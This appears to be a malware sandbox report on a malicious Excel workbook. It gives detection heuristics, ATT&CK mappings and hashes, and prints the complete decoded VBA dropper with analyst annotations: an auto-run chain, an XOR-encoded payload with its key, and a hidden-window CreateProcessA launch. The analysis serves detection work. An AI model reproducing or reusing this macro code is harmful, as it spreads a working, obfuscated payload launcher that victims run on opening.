MALICIOUS
156
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains both Excel 4.0 (XLM) macros and VBA macros, with heuristics firing for OLE_XLM_AUTOOPEN, OLE_VBA_MACROS, OLE_VBA_DOCOPEN, and OLE_VBA_WBOPEN. The presence of a CreateProcess API reference and the ClamAV detection signature 'Xls.Malware.Valyria-9756492-0' strongly indicate malicious intent, likely involving the execution of a secondary payload. The macros are designed to run automatically upon opening the document.
Heuristics 6
-
ClamAV: Xls.Malware.Valyria-9756492-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Malware.Valyria-9756492-0
-
Reference to CreateProcess API — high — SC_STR_CREATEPROCESS: Reference to CreateProcess API
-
Excel 4.0 (XLM) macro sheet present — medium — OLE_XLM_AUTOOPEN: Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Public Sub Document_Open() KP_G -
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
End Function Sub Workbook_Open() Document_Open
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 172 bytes |
SHA-256: 352ef780fe28bd5ff23a3746b4c014592cf18e817485f0403fde5997d9d0ca4f
Preview script — first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Macro
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
|||
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6134 bytes |
SHA-256: ff3c3627303aa5770e1180ce3959beb52547feb0b907cfdedd31d8475c8907ab
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module header as emitted by oletools.olevba (the macros.bas artifact above).
' VB_Name = "ThisWorkbook" marks this as the workbook's class module, which is
' why the Workbook_Open handler further down is an auto-run entry point: it
' fires as soon as the file is opened with macros enabled. Every other
' identifier in the module is randomised, so the readable anchors for an
' analyst are the Attribute block, the Kernel32 Declare, and the event names.
Option Explicit
' Win32 interop declarations, split on the VBA7 conditional so the module
' loads on both 64-bit hosts (LongPtr) and legacy 32-bit hosts (Long). The
' only meaningful name here is the imported Kernel32!CreateProcessA, which is
' what the SC_STR_CREATEPROCESS heuristic above keys on. Type names and field
' names are randomised, but the field layouts are the usual ones for that API
' (see the per-type notes); treat the layout matches as an analyst's reading,
' not something the sample states.
#If VBA7 Then
' Three-field record used for CreateProcessA's 3rd/4th arguments. DZ_E fills
' its first field with LenB(), which is consistent with
' SECURITY_ATTRIBUTES.nLength.
Private Type T_MIK
WF_I As Long
FPQ_X As LongPtr
XS_I As Long
End Type
' Four-field record passed in the last argument position; two pointer-sized
' fields followed by two Longs, consistent with PROCESS_INFORMATION. The
' handles written into it are never read or closed by this module.
Private Type LRB_ZB
DV_OA As LongPtr
LL_L As LongPtr
M_ZH As Long
I_P As Long
End Type
' Ten-argument import matching Kernel32's CreateProcessA. In this branch the
' 3rd, 4th and 7th parameters are typed As Any; the Q_MVO type it references
' is defined below it (order as emitted by olevba).
Private Declare PtrSafe Function CreateProcessA Lib "Kernel32" (ByVal DU_G As Long, ByVal LGK_BPN As String, CZ_X As Any, LK_OFM As Any, ByVal C_E As Long, ByVal LP_RU As Long, ByVal J_CP As Any, ByVal FB_BVQ As Long, K_DGR As Q_MVO, ESO_TF As LRB_ZB) As LongPtr
' Eighteen-field record passed in the 9th (lpStartupInfo) position. The field
' types — one Long, three Strings, eight Longs, two Integers, four pointer-sized
' values — line up with STARTUPINFO; DZ_E sets fields 1, 12 and 13 only.
Private Type Q_MVO
HX_G As Long
D_K As String
SV_PJ As String
LR_AAS As String
KB_J As Long
XN_HZ As Long
MBZ_UB As Long
SHA_A As Long
HBT_M As Long
V_VQ As Long
UA_ESV As Long
M_M As Long
Q_ZT As Integer
N_X As Integer
D_K2 As LongPtr
CV_OWG As LongPtr
O_IL As LongPtr
V_XGP As LongPtr
End Type
#Else
' 32-bit equivalents of the records above, with Long in place of LongPtr.
Private Type LRB_ZB
DV_OA As Long
LL_L As Long
M_ZH As Long
I_P As Long
End Type
Private Type Q_MVO
HX_G As Long
D_K As String
SV_PJ As String
LR_AAS As String
KB_J As Long
XN_HZ As Long
MBZ_UB As Long
SHA_A As Long
HBT_M As Long
V_VQ As Long
UA_ESV As Long
M_M As Long
Q_ZT As Integer
N_X As Integer
D_K2 As Long
CV_OWG As Long
O_IL As Long
V_XGP As Long
End Type
' Same import for 32-bit hosts; here the 3rd/4th parameters are typed T_MIK
' rather than As Any, and the 7th is a plain Long.
Private Declare Function CreateProcessA Lib "Kernel32" (ByVal DU_G As Long, ByVal LGK_BPN As String, CZ_X As T_MIK, LK_OFM As T_MIK, ByVal C_E As Long, ByVal LP_RU As Long, ByVal J_CP As Long, ByVal FB_BVQ As Long, K_DGR As Q_MVO, ESO_TF As LRB_ZB) As Long
Private Type T_MIK
WF_I As Long
FPQ_X As Long
XS_I As Long
End Type
#End If
' Launcher. Hands the already-decoded string L_NY to Kernel32!CreateProcessA as
' the 2nd argument (lpCommandLine) with the 1st (lpApplicationName) set to 0,
' and returns whatever the API returns. Called exactly once, from N_TJB, with
' the return value discarded — so a failed launch is silently ignored.
' Detection note: the observable is a child process whose parent is the
' Excel host; process-creation telemetry (EDR / Sysmon event 1) is where this
' shows up, not in the document itself.
Public Function DZ_E(ByVal L_NY As String)
Dim CSR_E As T_MIK
Dim LLS_N As T_MIK
Dim DCD_NC As Long
' &H20 goes into the 6th argument (dwCreationFlags); in the documented
' CreateProcess flag set that value is NORMAL_PRIORITY_CLASS — no
' CREATE_NO_WINDOW, no CREATE_SUSPENDED.
DCD_NC = &H20&
#If VBA7 Then
Dim Z_BDW As LongPtr
#Else
Dim Z_BDW As Long
#End If
Dim UCU_DAD As Q_MVO
' Field 1 = LenB(record), i.e. STARTUPINFO.cb.
UCU_DAD.HX_G = LenB(UCU_DAD)
' Field 12 = 1 and field 13 = 0. Read as STARTUPINFO this is
' dwFlags = STARTF_USESHOWWINDOW with wShowWindow = SW_HIDE, which is why the
' user sees no window when the document is opened.
UCU_DAD.M_M = &H1&
UCU_DAD.Q_ZT = 0
' First field of each SECURITY_ATTRIBUTES-shaped record = its own size; the
' remaining fields are left at their zero defaults.
CSR_E.WF_I = LenB(CSR_E)
LLS_N.WF_I = LenB(LLS_N)
Dim K_SL As LRB_ZB
' Z_BDW is never assigned, so the 7th argument (lpEnvironment) is 0;
' bInheritHandles is False and lpCurrentDirectory is 0. The process/thread
' handles returned in K_SL are never closed.
DZ_E = CreateProcessA(0&, L_NY, CSR_E, LLS_N, False, DCD_NC, Z_BDW, 0&, UCU_DAD, K_SL)
End Function
' Stage driver, reached via Workbook_Open -> Document_Open. It assembles the
' encoded payload from 33 short hex-string fragments (32 of 25 digits plus one
' of 36 — 836 hex digits, i.e. 418 encoded bytes) and passes the concatenation
' to N_TJB together with a 63-character key. Splitting the blob across many
' short literals is presumably meant to defeat simple string signatures; none
' of the fragments is meaningful on its own. N_TJB both decodes and executes,
' so the plaintext handed back in FZO_WN is never read here. This annotation
' deliberately does not decode the blob; the IoCs to pivot on are the ClamAV
' name and the two artifact SHA-256 values listed in the report above.
Public Sub KP_G()
Dim G_BZD As String
G_BZD = "3a29322e262b2c31342774273"
Dim N_F As String
N_F = "53c6d6511242c2b37281b3937"
Dim A_PWQ As String
A_PWQ = "2f267700382120242376683a2"
Dim ZAJ_V As String
ZAJ_V = "e3824203e2e2033740d256d6a"
Dim FSH_G As String
FSH_G = "22222a3d683e39273071756c2"
Dim D_BG As String
D_BG = "824307f0a040800150c0a7a69"
Dim ZF_S As String
ZF_S = "6d7e112422226c2a203a6f646"
Dim Z_O As String
Z_O = "e381132253e33216c04222039"
Dim AS_F As String
AS_F = "6168722a363176170414070c1"
Dim BBC_TXH As String
BBC_TXH = "61767726962123437377f3030"
Dim HP_RU As String
HP_RU = "286d3b7e6b70362123086b676"
Dim M_O As String
M_O = "2033c3a65092f282a3b2b681e"
Dim T_QR As String
T_QR = "37303732257f0b21356301203"
Dim BV_F As String
BV_F = "602243f2a36337776702a263a"
Dim DX_JC As String
DX_JC = "12780f3c28212b2a200376003"
Dim EZ_Z As String
EZ_Z = "b28386b042c31363073056b67"
Dim I_N As String
I_N = "626a3a222523603620353a6f7"
Dim KJL_B As String
KJL_B = "66e672d323f016b002e3a3829"
Dim P_NO As String
P_NO = "3b202c1026342264713c30373"
Dim HK_AW As String
HK_AW = "d316c68763e32397630392830"
Dim SQI_CZ As String
SQI_CZ = "26282229363f7a3b2b3977653"
Dim JX_AP As String
JX_AP = "72327363f670320202a2a3227"
Dim KJC_FSJ As String
KJC_FSJ = "232b3a6d32303462686169332"
Dim DON_ZV As String
DON_ZV = "b227b09061f1c061817746f63"
Dim EU_ZC As String
EU_ZC = "6a1e3a23366720363d74716a7"
Dim QO_N As String
QO_N = "560032f316804363221372c6b"
Dim KW_EQP As String
KW_EQP = "772122346d1b2e282e23761e3"
Dim QEH_R As String
QEH_R = "83d222a20363c382a2a686305"
Dim I_VO As String
I_VO = "2d312d2413373d243922316c6"
Dim U_CDD As String
U_CDD = "7282c207d1819150a19071971"
Dim C_AMH As String
C_AMH = "7e686a162a21247a3d3c317f6"
Dim VXF_IMC As String
VXF_IMC = "261621e2d22386b1d30203b3a"
Dim XYO_QD As String
XYO_QD = "3b3e6e6e0a336875152d256d7b033b332b33"
Dim FZO_WN As String
' First argument is the XOR key, second the concatenated hex blob. The call is
' the point of execution: N_TJB invokes DZ_E (CreateProcessA) before returning.
FZO_WN = N_TJB("JFEKTXDTXKZBMYMHFMBOX_HMNCCWHQEDAMVETAHVOXGLVTDCMBVGYIENXSXQUHM", G_BZD & N_F & A_PWQ & ZAJ_V & FSH_G & D_BG & ZF_S & Z_O & AS_F & BBC_TXH & HP_RU & M_O & T_QR & BV_F & DX_JC & EZ_Z & I_N & KJL_B & P_NO & HK_AW & SQI_CZ & JX_AP & KJC_FSJ & DON_ZV & EU_ZC & QO_N & KW_EQP & QEH_R & I_VO & U_CDD & C_AMH & VXF_IMC & XYO_QD)
End Sub
' Call-chain glue between Workbook_Open (below) and the stage driver KP_G.
' Document_Open is a Word event name; in an Excel ThisWorkbook module it is an
' ordinary Sub, so it runs only because Workbook_Open calls it. The
' OLE_VBA_DOCOPEN heuristic above matched on the name alone.
Public Sub Document_Open()
KP_G
End Sub
' Per-character decode step: bitwise XOR of one payload byte with one key
' byte. Used only from the loop in N_TJB; both inputs are Asc() values there.
Function JE_YTG(ByVal HX_G As Integer, ByVal XN_HZ As Integer)
JE_YTG = HX_G Xor XN_HZ
End Function
' 1-based single-character indexer (a Mid$ wrapper) that N_TJB uses to pick
' the key byte. BMG_TI is declared As String although the caller passes a
' Long; VBA's implicit conversion makes that work.
Function VRL_VJI(ByVal OFC_PJ As String, ByVal BMG_TI As String)
VRL_VJI = Mid$(OFC_PJ, BMG_TI, 1)
End Function
' Auto-executing entry point: the Excel Workbook_Open event fires when the file
' is opened with macros enabled (heuristic OLE_VBA_WBOPEN). The full chain from
' here is Workbook_Open -> Document_Open -> KP_G -> N_TJB -> DZ_E ->
' CreateProcessA. The report also flags an XLM auto-open macro sheet
' (OLE_XLM_AUTOOPEN), which is a second, independent auto-run path not shown
' in this VBA listing.
Sub Workbook_Open()
Document_Open
End Sub
' Decode-and-run. AW_VK is a hex string (two digits per byte) and F_VS is the
' XOR key. Each byte is XOR-ed with the key character at the same 1-based,
' wrapping position, the plaintext is accumulated in I_IO, and — before the
' function returns — the plaintext is executed via DZ_E (CreateProcessA). The
' name and return type make it look like a pure decoder; the side effect on the
' DZ_E line is the actual launch.
Public Function N_TJB(F_VS As String, AW_VK As String) As String
Dim MBS_WXU As Long
Dim MB_KON As String
Dim S_LES As Long
S_LES = 1
Dim I_IO As String
Dim FM_B As Integer, HI_ITQ As Integer, BMG_TI As Long
' Walk the hex string two characters at a time.
For MBS_WXU = 1 To Len(AW_VK) Step 2
' Chr(38) & Chr(104) is "&h", so this is CByte("&h" & <hex pair>); building the
' prefix from character codes presumably keeps the literal "&h" out of the
' source text.
MB_KON = ChrW(CByte(Chr(38) & Chr(104) & Mid$(AW_VK, MBS_WXU, 2)))
' Key position cycles 1..Len(F_VS); Mod yields 0 at the wrap point, hence the
' fix-up on the next line.
BMG_TI = S_LES Mod Len(F_VS)
If BMG_TI = 0 Then BMG_TI = Len(F_VS)
FM_B = Asc(MB_KON)
HI_ITQ = Asc(VRL_VJI(F_VS, BMG_TI))
I_IO = I_IO + Chr(JE_YTG(FM_B, HI_ITQ))
S_LES = S_LES + 1
Next
' Execute the decoded string. The parenthesised argument is a call statement,
' so DZ_E's return value (the CreateProcessA result) is discarded.
DZ_E (I_IO)
N_TJB = I_IO
End Function
|
|||